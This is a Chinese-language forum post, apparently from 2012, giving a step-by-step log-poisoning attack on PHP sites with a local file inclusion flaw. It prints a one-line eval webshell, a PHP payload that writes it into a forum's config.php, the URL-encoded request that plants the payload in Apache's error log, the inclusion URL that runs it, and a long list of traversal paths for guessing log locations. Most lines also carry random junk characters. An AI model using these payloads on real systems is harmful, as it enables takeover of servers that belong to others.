因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 ) U6 b$ f: Z7 N- s
/ q4 N% r+ `7 w& Q9 B) K
比如还是这句一句话木马
& Z9 \% Y8 {7 _0 D3 Z! ?2 [3 } w<?eval($_POST[cmd]);?> , r7 L2 t/ H4 e9 [4 J) g* \
7 Q" m6 W% X; ^% b1 o0 [到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, + I7 Q( r9 w( W/ `* ^4 P
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
, D: o5 E% ?2 b2 E# d4 F( L- @' s: ~" z0 S; o! I/ ]
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); 8 T0 j& Z/ ^4 W4 e7 a
fclose($fp);?> //在config.php里写入一句木马语句 " ~, Z' C8 l1 K h g
7 ]( l3 c2 B2 A& V
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 6 K5 w) z: y3 B* \, ~9 [. f
转换为
- N& ^% x9 ~2 y; p4 K%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
- Z q- D3 S7 y7 bconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp ' g* t A6 D, `/ z9 ^9 N
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
1 ~: d. D( i, p* z3 v! l. zfclose%28%24fp%29%3B%3F%3E
2 B& o+ g( \2 d# w. c我们提交
/ i+ A6 y( |$ C+ \http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
1 ~/ Z+ i0 e3 e! b) w: V D2 q; P%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
& a$ Q& J( ~: i" r# J%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B ' x3 p- X2 L3 H/ l! G, I; u8 q: K
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
2 P+ _4 r6 J# _
; q- W5 D. l" w" [4 |; _1 Z0 A, x这样就错误日志里就记录下了这行写入webshell的代码。
9 ?2 m4 x9 ~$ C$ `" O6 k) A. t我们再来包含日志,提交 6 v5 P) J2 A: ]% p- q
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
3 E) u) w9 ]# }( h' U) Z' f8 b7 A$ B; [7 O1 W
这样webshell就写入成功了,config.php里就写入一句木马语句
$ q6 g+ e0 t8 F/ aOK.
; {% ?6 M7 K% i, a: V q* _" N) Whttp://www.xxx.com/forum/config.php这个就成了我们的webshell " j# c; J2 {( g B# z, W8 }0 ~
直接用lanker的客户端一连,主机就是你的了。
* Y; ?$ n, k, \+ A+ s1 N
& s7 q; v; M$ |% QPS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
8 z+ n3 p ], Q* e
1 J5 o$ B" O) z: o其他的日志路径,你可以去猜,也可以参照这里。
# h1 l: d! @% J. {) F o../../../../../../../../../../var/log/httpd/access_log 1 U* v8 ~) C# Y* `# O5 A& E
../../../../../../../../../../var/log/httpd/error_log 7 d- L1 |& W! k: c
../apache/logs/error.log ) y) ~" F, @7 ]- V' g
../apache/logs/access.log 2 a0 I' }* _' g8 e2 v6 D
../../apache/logs/error.log 7 c) }0 C7 I; R' L9 g
../../apache/logs/access.log
5 u! d2 P& F: a- E, S1 E5 w../../../apache/logs/error.log
- ?7 n( R! v: K( @7 ]1 ` o../../../apache/logs/access.log 8 @: y4 G7 h7 U* T
../../../../../../../../../../etc/httpd/logs/acces_log 2 G1 @# C& Q6 U3 J3 z
../../../../../../../../../../etc/httpd/logs/acces.log
' H( [5 e3 d) S6 H' W../../../../../../../../../../etc/httpd/logs/error_log
/ p' \ Z6 A* S* t../../../../../../../../../../etc/httpd/logs/error.log
* R" C& p2 J; ^* Q5 c../../../../../../../../../../var/www/logs/access_log $ y1 J' d1 r, S& W
../../../../../../../../../../var/www/logs/access.log
+ [ K' u% Q b6 J. Y../../../../../../../../../../usr/local/apache/logs/access_log 5 T% N- u8 O- g# E
../../../../../../../../../../usr/local/apache/logs/access.log 0 y5 }, }$ ~2 g" q( V& A/ Z
../../../../../../../../../../var/log/apache/access_log
( m6 T) Z1 }" v! ^: Q" M( ~7 s! c7 f& |5 |../../../../../../../../../../var/log/apache/access.log
4 R! G+ w1 I/ I- H' P$ r../../../../../../../../../../var/log/access_log
- h: q* u7 v6 G+ _. ?../../../../../../../../../../var/www/logs/error_log L T5 C6 R$ m4 y- x- z
../../../../../../../../../../var/www/logs/error.log
' D- ^6 p0 Q4 {../../../../../../../../../../usr/local/apache/logs/error_log # M1 s/ C. K* p* e% E! f1 J% a
../../../../../../../../../../usr/local/apache/logs/error.log ! N) f' H4 H9 l$ q; n/ C
../../../../../../../../../../var/log/apache/error_log
) M/ C. [6 ^2 [) R9 y; ~1 u2 X../../../../../../../../../../var/log/apache/error.log
8 h& F) s, d; Q( H* `8 A3 H../../../../../../../../../../var/log/access_log
' s w0 u# X6 d$ q* m../../../../../../../../../../var/log/error_log . y% l; L9 q2 r; L
/var/log/httpd/access_log 1 k; w1 R' T2 G+ a; t$ O* k
/var/log/httpd/error_log
, y) Q+ }# E2 }% L& N4 i8 ^0 O" [../apache/logs/error.log 5 Z( n% Y/ ^1 W# `8 W( I
../apache/logs/access.log ( e9 X$ m) ^7 `
../../apache/logs/error.log ( j2 |" b6 i8 p& O$ h4 e6 q
../../apache/logs/access.log
: p/ l; Y) {7 R( d2 e& S../../../apache/logs/error.log
: o. b3 g& b3 _, ]) x6 S; N../../../apache/logs/access.log
2 t, h! c9 `9 L- W' }# s7 ]( c" M/etc/httpd/logs/acces_log 9 s& ~8 z/ \# G" t5 [
/etc/httpd/logs/acces.log
( ~* k; n) Y( k0 _" x( W. v/etc/httpd/logs/error_log 7 I. `/ ^. @3 c3 K. N* {/ x
/etc/httpd/logs/error.log
2 |/ B. q. _9 {8 b) O2 h) Z5 s" G4 m/var/www/logs/access_log . @ N6 a+ t$ _/ v6 Y5 e/ K4 [
/var/www/logs/access.log
; z D: L/ N3 ]5 E8 C: c/usr/local/apache/logs/access_log
3 l5 o8 G% b1 _9 r0 q: m/usr/local/apache/logs/access.log
" X$ v/ d: X& T4 S/var/log/apache/access_log / e% X: ^7 f' {7 m0 w0 z2 [/ H+ c" e
/var/log/apache/access.log ( I" Z) J; Y! k/ [ m* z; T- h' [% @
/var/log/access_log
. q& U3 B0 Y# U9 s/var/www/logs/error_log
% Y0 F& j& A3 g p& F' {/var/www/logs/error.log / i# {) g) ? v8 I
/usr/local/apache/logs/error_log . B: k: w; y9 e& P
/usr/local/apache/logs/error.log
8 g4 R: B( ^1 q% p/var/log/apache/error_log 5 L( S; [3 ~7 L
/var/log/apache/error.log
5 D# @: [1 ?: G! G1 M$ o/var/log/access_log
& M/ I7 ?% Y" l" `1 q z/var/log/error_log |
发表于 2012-9-15 14:27:40
收藏
支持
反对